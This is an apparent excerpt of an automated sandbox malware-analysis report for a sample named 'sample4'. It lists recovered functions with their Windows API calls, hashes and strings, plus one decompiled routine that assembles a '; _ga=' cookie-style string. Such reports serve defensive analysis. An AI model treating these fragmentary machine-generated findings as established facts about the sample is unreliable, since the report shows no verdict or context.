DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 0011E5D5
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 0011E5DF

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Window$ClientRectScreen$DeferEqualParent
String ID:
API String ID: 443303494-0
Opcode ID: 79edb1556fdb47ffe0ed20949d1a8a8ad4642154114788c9a6481520ec46186a
Instruction ID: 28cb4babe65e53c06b962059702630467b83852b82d8bfd3324478a03b2ccde8
Opcode Fuzzy Hash: 79edb1556fdb47ffe0ed20949d1a8a8ad4642154114788c9a6481520ec46186a
Instruction Fuzzy Hash: D121BC7590020AEFCB10DFA8ED489AEFBF9FF59704B10456AE915E3114EB71A950CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0012CF3F, Relevance: 10.6, APIs: 7, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 0012CF59
IsWindowEnabled.USER32(00000000), ref: 0012CF76
GetDlgItem.USER32(?), ref: 0012CF8C
IsWindowEnabled.USER32(00000000), ref: 0012CFA5
GetFocus.USER32 ref: 0012CFC3
IsWindowEnabled.USER32(00000000), ref: 0012CFCA
SetFocus.USER32(00000000), ref: 0012CFD5

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: EnabledWindow$FocusItem
String ID:
API String ID: 3538048848-0
Opcode ID: 1976900f38728d60598aa8dd9dec3a55fd9b74902e3dfc6ba084b96d5e0ac05d
Instruction ID: fc706cf624f669148d8d080a1c3a6d8986646abd99fd7b5561518a801a921ca2
Opcode Fuzzy Hash: 1976900f38728d60598aa8dd9dec3a55fd9b74902e3dfc6ba084b96d5e0ac05d
Instruction Fuzzy Hash: 4F11C4312002316BD7056B64FC4CB6EBB2EFF8A760B050226FA5292170DF74DC219BD4

Uniqueness

Uniqueness Score: -1.00%

Function 0015188E, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(?,?,PNG,?,?,000D9C54,000D9C54,?,001526FF,?,00000000,?), ref: 001518B0
LoadResource.KERNEL32(?,00000000,?,?,000D9C54,000D9C54,?,001526FF,?,00000000,?), ref: 001518BF
LockResource.KERNEL32(00000000,?,000D9C54,000D9C54,?,001526FF,?,00000000,?), ref: 001518CC
SizeofResource.KERNEL32(?,00000000,?,000D9C54,000D9C54,?,001526FF,?,00000000,?), ref: 001518DF

Part of subcall function 00151905: GlobalAlloc.KERNEL32(00000002,?,00000000,?,?,?,001518F1,00000000,00000000,?,000D9C54,000D9C54,?,001526FF,?,00000000), ref: 00151912

FreeResource.KERNEL32(00000000,00000000,00000000,?,000D9C54,000D9C54,?,001526FF,?,00000000,?), ref: 001518F4

Strings

PNG, xrefs: 001518A7

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Resource$AllocFindFreeGlobalLoadLockSizeof
String ID: PNG
API String ID: 169377235-364855578
Opcode ID: 98254a267f921edb11c778f57058775371313079c64b888dbfac39531355b34a
Instruction ID: d0914ed2b4c8ce3a7c5646e8cd35b35f7bc2cfb396b8d5dbb0bce8200562df11
Opcode Fuzzy Hash: 98254a267f921edb11c778f57058775371313079c64b888dbfac39531355b34a
Instruction Fuzzy Hash: 7A01A23A900619FB5B226B95EC48DAFBB7CEF8676271141A5FD20A7300DFB0DD0097A0

Uniqueness

Uniqueness Score: -1.00%

Function 000D1D68, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000D1D68(WCHAR* __ecx, void* __eflags, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v4;
				char _v16;
				WCHAR* _t20;
				void* _t24;
				signed int _t26;
				signed int _t27;
				signed int _t28;
				WCHAR* _t31;

				_t20 = __ecx;
				E000D1984( &_v16, _t24);
				_t26 = wsprintfW(__ecx, L"%s%u", L"; _ga=", _v16);
				_t31 = ".";
				_t27 = _t26 + wsprintfW(_t20 + _t26 * 2, L"%s%u", _t31, _v4);
				_t28 = _t27 + wsprintfW(_t20 + _t27 * 2, L"%s%u", _t31, _a12);
				return wsprintfW(_t20 + _t28 * 2, L"%s%u", _t31, _a16) + _t28;
			}

0x000d1d6e
0x000d1d75
0x000d1d95
0x000d1d97
0x000d1dac
0x000d1dbe
0x000d1dd8

APIs

wsprintfW.USER32 ref: 000D1D8F
wsprintfW.USER32 ref: 000D1DA6
wsprintfW.USER32 ref: 000D1DB8
wsprintfW.USER32 ref: 000D1DCA

Strings

; _ga=, xrefs: 000D1D84
%s%u, xrefs: 000D1D89, 000D1D9D, 000D1DAF, 000D1DC1

Memory Dump Source

Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d0000_sample4.jbxd

Yara matches

Similarity

API ID: wsprintf
String ID: %s%u$; _ga=
API String ID: 2111968516-3272795577
Opcode ID: 60eb5d3ac1c0e9c71912f1c246695e602b71bd7367b4abf55e5c024e2f7924a1
Instruction ID: 0911ae6007f8ba7dc892df5dfd0ff500655ca3b91533e4b3d9a6838e47f4ee20
Opcode Fuzzy Hash: 60eb5d3ac1c0e9c71912f1c246695e602b71bd7367b4abf55e5c024e2f7924a1
Instruction Fuzzy Hash: 8CF0C83290030C7BC700AB55EC41CA77F9DDF86398B410567FA1493307EB36A5188AF1

Uniqueness

Uniqueness Score: -1.00%

Function 00133C54, Relevance: 9.4, APIs: 6, Instructions: 445COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00133C5B

Part of subcall function 0011FF37: GetWindowTextLengthW.USER32(?), ref: 0011FF48
Part of subcall function 0011FF37: GetWindowTextW.USER32(?,00000000,00000000), ref: 0011FF5F

InflateRect.USER32(?,?,?), ref: 00133DB5
SetRectEmpty.USER32(?), ref: 00133DC1
InflateRect.USER32(?,00000000,00000000), ref: 00133E6D
OffsetRect.USER32(?,00000001,00000001), ref: 00133F2A
IsRectEmpty.USER32(?), ref: 00133FD7

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Rect$EmptyInflateTextWindow$H_prolog3_LengthOffset
String ID:
API String ID: 2648887860-0
Opcode ID: 7cd27cb59fa6fb42924c9202183a55f98eb33ea015790f8501bd1ad112e7aaea
Instruction ID: 3874d1fdcca777c6842adaf83699c62ede13e760f7d9e453eedebbabfa250e37
Opcode Fuzzy Hash: 7cd27cb59fa6fb42924c9202183a55f98eb33ea015790f8501bd1ad112e7aaea
Instruction Fuzzy Hash: 2EF16971A102298FCF18DFA8C894AEE77B9BF48300F094179E916EB285DB34AD45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0025F0B7, Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(002811B0,00000000,00000000), ref: 0025F0FF
__fassign.LIBCMT ref: 0025F2DE
__fassign.LIBCMT ref: 0025F2FB
WriteFile.KERNEL32(?,00000010,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0025F343
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0025F383
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0025F42F

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 84610374709ff7990f60dcd84bc27d064fd52e21cf73303938423b7d0d12c9cb
Instruction ID: fa3a86ccdd9e032b8ffb05c9eb125f309509f37088970ab4e1d9df2f1df12787
Opcode Fuzzy Hash: 84610374709ff7990f60dcd84bc27d064fd52e21cf73303938423b7d0d12c9cb
Instruction Fuzzy Hash: 3CD1DB75D102499FCF15CFA8D9809EEBBB5EF48310F28406AE815FB242D730AA5ACF54

Uniqueness

Uniqueness Score: -1.00%

Function 001208B6, Relevance: 9.2, APIs: 6, Instructions: 225libraryloaderCOMMON

Download Yara Rule

APIs

ScreenToClient.USER32(?,?), ref: 0012097E
GetModuleHandleW.KERNEL32(000D20E8), ref: 00120B35
__Init_thread_footer.LIBCMT ref: 00120B41

Part of subcall function 00118704: __CxxThrowException@8.LIBVCRUNTIME ref: 00118718

GetProcAddress.KERNEL32(000D2158), ref: 00120B75
GetProcAddress.KERNEL32(000D2168), ref: 00120B8B
__Init_thread_footer.LIBCMT ref: 00120B97

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: AddressInit_thread_footerProc$ClientException@8HandleModuleScreenThrow
String ID:
API String ID: 4082382604-0
Opcode ID: c4d588f8caea8225067e86edf83c6bf48e03509aaab57d2cfcb4cce9f442f601
Instruction ID: 4d556a96f688420378c51dfb871ee11802766b317fffe6b774e5b031405d1459
Opcode Fuzzy Hash: c4d588f8caea8225067e86edf83c6bf48e03509aaab57d2cfcb4cce9f442f601
Instruction Fuzzy Hash: BF91B375A10626EFCB15DF68E888AADBBF4FF0C314B150269E50597661DB31ADB0CF80

Uniqueness

Uniqueness Score: -1.00%

Function 0014808E, Relevance: 9.1, APIs: 6, Instructions: 140windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000100,?,00000000), ref: 00148115
SendMessageW.USER32(?,0000020A,?,?), ref: 00148198
IsWindow.USER32(?), ref: 001481BD
ClientToScreen.USER32(?,?), ref: 001481CE
IsWindow.USER32(?), ref: 001481EB
ClientToScreen.USER32(?,?), ref: 0014821E

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: ClientMessageScreenSendWindow
String ID:
API String ID: 2093367132-0
Opcode ID: 04dfaceafbda3d02386b49a2875eb0bcc736342dff0d499775c9bceaa9fb8dfb
Instruction ID: 61e955040fa6eb32afd645ac2b011b77686236d9658301885feaec6f95fa65f9
Opcode Fuzzy Hash: 04dfaceafbda3d02386b49a2875eb0bcc736342dff0d499775c9bceaa9fb8dfb
Instruction Fuzzy Hash: BB41A131500A00EFEB356B64CC48B7EB6B5EB19B90F20443BE896D2171EF71DC92D611

Uniqueness

Uniqueness Score: -1.00%

Function 00131140, Relevance: 9.1, APIs: 6, Instructions: 128memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00118BC6: __EH_prolog3_catch.LIBCMT ref: 00118BCD

GetModuleHandleW.KERNEL32(000D2E8C,0013127C,00000000,00000000,?,?,?,0012D32B,?,?,0012BCF4,00000000,0000001C,0012D128,00000000,0012BCF4), ref: 00131173
GetUserDefaultUILanguage.KERNEL32(?,?,0012D32B,?,?,0012BCF4,00000000,0000001C,0012D128,00000000,0012BCF4), ref: 00131184
FindResourceExW.KERNEL32(?,00000005,?,0000FC11,?,?,0012D32B,?,?,0012BCF4,00000000,0000001C,0012D128,00000000,0012BCF4), ref: 001311C3
FindResourceW.KERNEL32(?,?,00000005,?,?,0012D32B,?,?,0012BCF4,00000000,0000001C,0012D128,00000000,0012BCF4), ref: 001311E0
LoadResource.KERNEL32(?,00000000,?,?,0012D32B,?,?,0012BCF4,00000000,0000001C,0012D128,00000000,0012BCF4), ref: 001311EE

Part of subcall function 001312BC: EnumFontFamiliesExW.GDI32(00000000,?,001312A6,?,00000000,?,?,?,?,?,?,00000000), ref: 0013132D

GlobalAlloc.KERNEL32(00000040,00000000,?,?,0012D32B,?,?,0012BCF4,00000000,0000001C,0012D128,00000000,0012BCF4), ref: 0013121E

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Resource$Find$AllocDefaultEnumFamiliesFontGlobalH_prolog3_catchHandleLanguageLoadModuleUser
String ID:
API String ID: 1616457240-0
Opcode ID: 282ba684dfbaa5041d2d96cd8b58bd8d0d1af62fde36051138dae76a325c68c6
Instruction ID: 588ea093047fc5a3777ba9763b632774dd78b2b19bdab6705c8544fc5bb52ee2
Opcode Fuzzy Hash: 282ba684dfbaa5041d2d96cd8b58bd8d0d1af62fde36051138dae76a325c68c6
Instruction Fuzzy Hash: 72411576600206BBEB14ABA4DC4AEBB77A9EF81710F208139FD15DB290EF70DD408761

Uniqueness

Uniqueness Score: -1.00%

Function 00131F93, Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 00131FCF

Part of subcall function 0011E5F8: UnhookWindowsHookEx.USER32(?), ref: 0011E622

IsWindowEnabled.USER32(?), ref: 00131FFE
EnableWindow.USER32(00000001,00000000), ref: 00132019
EnableWindow.USER32(00000000,00000001), ref: 001320B8
IsWindow.USER32(?), ref: 001320C2
SetFocus.USER32(?), ref: 001320CD

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Window$EnableFocus$EnabledHookUnhookWindows
String ID:
API String ID: 2931672367-0
Opcode ID: a143819e3e228af81aa75cdfc0da7fd1f37eb410460efa885e9139b344f2747e
Instruction ID: b666be446a2aeeca3e1546b70eb4f70d7c40f406009791c28b2c43fa4207d638
Opcode Fuzzy Hash: a143819e3e228af81aa75cdfc0da7fd1f37eb410460efa885e9139b344f2747e
Instruction Fuzzy Hash: 3F416A34700205EFDB1CBFA4D889B99FBA9BF45300F158169F41997262DB71E898DF81

Uniqueness

Uniqueness Score: -1.00%

Function 00137B21, Relevance: 9.1, APIs: 6, Instructions: 101windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00137B2C
SendMessageW.USER32(?,00000146,00000000,00000000), ref: 00137B4D
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00137B61
SendMessageW.USER32(?,00000146,00000000,00000000), ref: 00137B8E
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00137BA2
__EH_prolog3.LIBCMT ref: 00137BBC

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: MessageSend$H_prolog3Window
String ID:
API String ID: 3728102838-0
Opcode ID: 2b149e8e075be29a45a9a2b6e9957d50b3a4fa4a0e8576e87ca9e2725e682657
Instruction ID: f6b037af9579a90d11c1f905067ae029525ed5b3fc9cd18514f844d07f50f6bf
Opcode Fuzzy Hash: 2b149e8e075be29a45a9a2b6e9957d50b3a4fa4a0e8576e87ca9e2725e682657
Instruction Fuzzy Hash: 6C31C131601125BBDB29AB60DC4AAEFBB79FF56361F100229F405A32E1DF719D50CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00122572, Relevance: 9.1, APIs: 6, Instructions: 89windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00122593
GetWindow.USER32(?,00000005), ref: 001225AA
GetWindowRect.USER32(00000000,00000000), ref: 001225CE

Part of subcall function 0012840E: ScreenToClient.USER32(?,?), ref: 0012841D
Part of subcall function 0012840E: ScreenToClient.USER32(?,00000000), ref: 0012842A

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000015,00000000), ref: 001225F4
GetWindow.USER32(00000000,00000002), ref: 001225FD
ScrollWindow.USER32(?,?,?,?,?), ref: 00122619

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Window$ClientScreen$RectScrollVisible
String ID:
API String ID: 1714389229-0
Opcode ID: c076b9c0066ce744dd36c841fb9916b8778f3bdf83add335768b5089d4982ea5
Instruction ID: 23b7f2b100491d1ea03e07ef937cf3102372b00c1af70520dc2b8f1b44d8c423
Opcode Fuzzy Hash: c076b9c0066ce744dd36c841fb9916b8778f3bdf83add335768b5089d4982ea5
Instruction Fuzzy Hash: 4F317A32610219AFDB11AF94EC88BBFB7B9FF89711F114019F905A7211EB74ED219B60

Uniqueness

Uniqueness Score: -1.00%

Function 0013841B, Relevance: 9.1, APIs: 6, Instructions: 75COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00138422

Part of subcall function 00124A38: IsWindowEnabled.USER32(?), ref: 00124A43

InvalidateRect.USER32(?,00000000,00000001,0000000C,001387FC), ref: 0013844E
UpdateWindow.USER32(?), ref: 00138457

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Window$EnabledH_prolog3InvalidateRectUpdate
String ID:
API String ID: 262192325-0
Opcode ID: 48718b4e531f5b155ebdf15d2cc4ab9ba3f0c62a8c80c551973a2e117ba0177e
Instruction ID: 47a43741a2dbd2f9ae9444696a54ef015018ef48f25cc61c22cd624d2741eeba
Opcode Fuzzy Hash: 48718b4e531f5b155ebdf15d2cc4ab9ba3f0c62a8c80c551973a2e117ba0177e
Instruction Fuzzy Hash: 1E218971800705ABCB29EBB4DC49AAFBBB8FFA9300F10452DF05A96251DB30A941CB21

Uniqueness

Uniqueness Score: -1.00%

Function 0012039E, Relevance: 9.1, APIs: 6, Instructions: 72COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 001203BE
FindResourceW.KERNEL32(?,00000000,000D2580), ref: 001203F6
SizeofResource.KERNEL32(?,00000000), ref: 00120408
LoadResource.KERNEL32(?,?), ref: 00120415
LockResource.KERNEL32(00000000), ref: 00120422
FreeResource.KERNEL32(00000000), ref: 00120447

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Resource$FindFreeLoadLockSizeofWindow
String ID:
API String ID: 4180966417-0
Opcode ID: 617c7d9b8fc64c35ef2914244ec021be22529e2cb0bcd6dec592c040f884a0cb
Instruction ID: 963b49b96fa77136055454835b12807f5579677e73ae408aa2a3e8e2b4c49f24
Opcode Fuzzy Hash: 617c7d9b8fc64c35ef2914244ec021be22529e2cb0bcd6dec592c040f884a0cb
Instruction Fuzzy Hash: 33216675A00214AFDB127FA4BC4866E7BF4EB59701F148269EA05D3212EB71CD60D751

Uniqueness

Uniqueness Score: -1.00%

Function 00126814, Relevance: 9.1, APIs: 6, Instructions: 61COMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0012682E
GetWindow.USER32(?,00000005), ref: 00126837
GetDlgCtrlID.USER32(00000000), ref: 00126846
GetWindowRect.USER32(00000000,?), ref: 00126874
PtInRect.USER32(?,?,?), ref: 00126884
GetWindow.USER32(00000000,00000002), ref: 00126891

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Window$Rect$ClientCtrlScreen
String ID:
API String ID: 2874268147-0
Opcode ID: 83e2dca0bbc49365303d7204a3b80276d94be32524e903585c87723e8b9bf3c0
Instruction ID: 167c8464757065ad3e48a1d5f6d7310de9aba983af788f80ab36b0564ab6c487
Opcode Fuzzy Hash: 83e2dca0bbc49365303d7204a3b80276d94be32524e903585c87723e8b9bf3c0
Instruction Fuzzy Hash: EE118F31901229ABDB11AF65AC0CAAF7BBCEF86710F114125F811E7290DB74DA258BA5

Uniqueness

Uniqueness Score: -1.00%

Function 001347BB, Relevance: 9.1, APIs: 6, Instructions: 56windowtimeCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 001347CD

Part of subcall function 00124852: GetDlgCtrlID.USER32(?), ref: 0012485D

SendMessageW.USER32(?,00000111,?,?), ref: 001347F6
SetCapture.USER32(?,?,?,?,0013B165,?,?,?), ref: 0013481E
InvalidateRect.USER32(?,00000000,00000001,?,?,?,0013B165,?,?,?), ref: 00134835
UpdateWindow.USER32(?), ref: 0013483E
SetTimer.USER32(?,0000EC0D,?,00000000), ref: 00134858

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: CaptureCtrlInvalidateMessageParentRectSendTimerUpdateWindow
String ID:
API String ID: 171814724-0
Opcode ID: e09d43b51faff08d9deda4f0158a9aa8d89849fcc259c480358bd1f77b9b63a7
Instruction ID: 30b968cf2f4bb15c816f046ddfe350b9a3ee42e7c4d299966cecdd50eca3fdda
Opcode Fuzzy Hash: e09d43b51faff08d9deda4f0158a9aa8d89849fcc259c480358bd1f77b9b63a7
Instruction Fuzzy Hash: F4115471710666FFD7082FB0DC88A66BB6AFF59301F10423AF55981530CB70A821DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 0017A1A9, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 253COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0017A1B0

Strings

0, xrefs: 0017A2DC
0, xrefs: 0017A258

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: H_prolog3
String ID: 0$ 0
API String ID: 431132790-416354617
Opcode ID: 5e074b9ea46bae21a268f2abd4a71948e4a39912a89d40767340d0841aaaf3c5
Instruction ID: 7e5d7992a37c4d24df5b314197e2d3dea1f4a2d8ce42b7c55fe839a44ef1ee86
Opcode Fuzzy Hash: 5e074b9ea46bae21a268f2abd4a71948e4a39912a89d40767340d0841aaaf3c5
Instruction Fuzzy Hash: 4E919F31A0021A9FCF08EFA8DD99AAE7BB5FF94300F508129F459EB291DB35D910DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00152596, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0015259D
LoadImageW.USER32(?,00000000,00000000,00000000,00000000,00002000), ref: 00152740
GetObjectW.GDI32(00000000,00000018,?), ref: 00152752

Part of subcall function 001527DF: GetObjectW.GDI32(?,00000054,?), ref: 001527F9

Part of subcall function 0014EBAD: __EH_prolog3_GS.LIBCMT ref: 0014EBB7

DeleteObject.GDI32(00000000), ref: 001527AA

Strings

0, xrefs: 001527B7

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Object$DeleteH_prolog3H_prolog3_ImageLoad
String ID: 0
API String ID: 3496229131-1727780284
Opcode ID: 5c891a9e5e6bc412d8b141d5df48f1800d8e0d9e6cf75d2a9d82a873f0526b53
Instruction ID: 1c8cfd161a893d2dbe05c014b734c8b4ea5753f261bab00b667798c585408b67
Opcode Fuzzy Hash: 5c891a9e5e6bc412d8b141d5df48f1800d8e0d9e6cf75d2a9d82a873f0526b53
Instruction Fuzzy Hash: BB718B72901215CFCF19EF64C8847EE7BB1AF1A311F1441AAEC256F286CB359949CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0011D7CF, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetMenuCheckMarkDimensions.USER32 ref: 0011D7E5
LoadBitmapW.USER32(00000000,00007FE3), ref: 0011D8E9
__EH_prolog3_catch.LIBCMT ref: 0011D90F

Strings

X%, xrefs: 0011D951
l%, xrefs: 0011D958

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: BitmapCheckDimensionsH_prolog3_catchLoadMarkMenu
String ID: X%$l%
API String ID: 1577477441-3665333997
Opcode ID: 899825b5ec4623dcecc45bdffd9f02a0dd1992e5b41abde2357a5090791d207c
Instruction ID: 8a2d37cbef5c870e80aadc0a4c1f6bb68e1b1eed3e36ed6d103b5e206d57ae23
Opcode Fuzzy Hash: 899825b5ec4623dcecc45bdffd9f02a0dd1992e5b41abde2357a5090791d207c
Instruction Fuzzy Hash: B041E575A003198FDB289F28EC85BADB7B4FF54304F5040BEE549EB241CB719A858F50

Uniqueness

Uniqueness Score: -1.00%

Function 0012D79F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0012D7A6
__CxxThrowException@8.LIBVCRUNTIME ref: 0012D7DF
__EH_prolog3.LIBCMT ref: 0012D7EC

Part of subcall function 00125255: __EH_prolog3.LIBCMT ref: 0012525C

Strings

d/(, xrefs: 0012D807, 0012D7C1
d/(, xrefs: 0012D7D6, 0012D81E, 0012D86D, 0012D878, 0012D897, 0012D7DE, 0012D870

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: H_prolog3$Exception@8Throw
String ID: d/($d/(
API String ID: 2489616738-2734272428
Opcode ID: f6ecec2f164f45c4d49ec6257ea4130eb7687496962dc6c5b761888bcff7f598
Instruction ID: 4a422219d4029930b9ecd9ce84eb92de1755a6197e6b893346b228b9e6391c15
Opcode Fuzzy Hash: f6ecec2f164f45c4d49ec6257ea4130eb7687496962dc6c5b761888bcff7f598
Instruction Fuzzy Hash: BC319C71911216ABDF19EFB4DC52BEEB775AF14314F148A28F422AB1D1CB30DAA4CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0011E2AB, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78libraryloaderthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00118C1C: __EH_prolog3.LIBCMT ref: 00118C23

GetCurrentThreadId.KERNEL32 ref: 0011E2D3
SetWindowsHookExW.USER32(00000005,00122E8F,00000000,00000000), ref: 0011E2E3
GetProcAddress.KERNEL32(00000000,000D2198), ref: 0011E346
FreeLibrary.KERNEL32(?,?,00118752), ref: 0011E356

Strings

${(, xrefs: 0011E2B5

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: AddressCurrentFreeH_prolog3HookLibraryProcThreadWindows
String ID: ${(
API String ID: 3379832378-964378601
Opcode ID: 1a4d16aa40fe42eabedf01d2ebe3f768fe9a00f7cead14944665e0d1e3dd1613
Instruction ID: af6c7fa2e5becd4863303e46d6fe04bfa34bcc27b242febe02c585da3407b29e
Opcode Fuzzy Hash: 1a4d16aa40fe42eabedf01d2ebe3f768fe9a00f7cead14944665e0d1e3dd1613
Instruction Fuzzy Hash: 5E21F635601716ABC7283BE19C06BDB7BD8EF50B21F108439FE1696590DF70D8D08AB2

Uniqueness

Uniqueness Score: -1.00%

Function 00130D8E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetStockObject.GDI32(00000011), ref: 00130DB0
GetStockObject.GDI32(0000000D), ref: 00130DBC
GetObjectW.GDI32(00000000,0000005C,?,?,?,00000000), ref: 00130DCD
MulDiv.KERNEL32(?,00000048,00000000), ref: 00130DFF

Strings

hF, xrefs: 00130DA6

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Object$Stock
String ID: hF
API String ID: 1996491644-1628952500
Opcode ID: 071aed78198d57394066256a1838762bb92eb58a5cdcf062c7bade491d059d6a
Instruction ID: cf0efa7bad1dbca515d7633f369bfb34047a077c77675ac38e2e63f42e79edcb
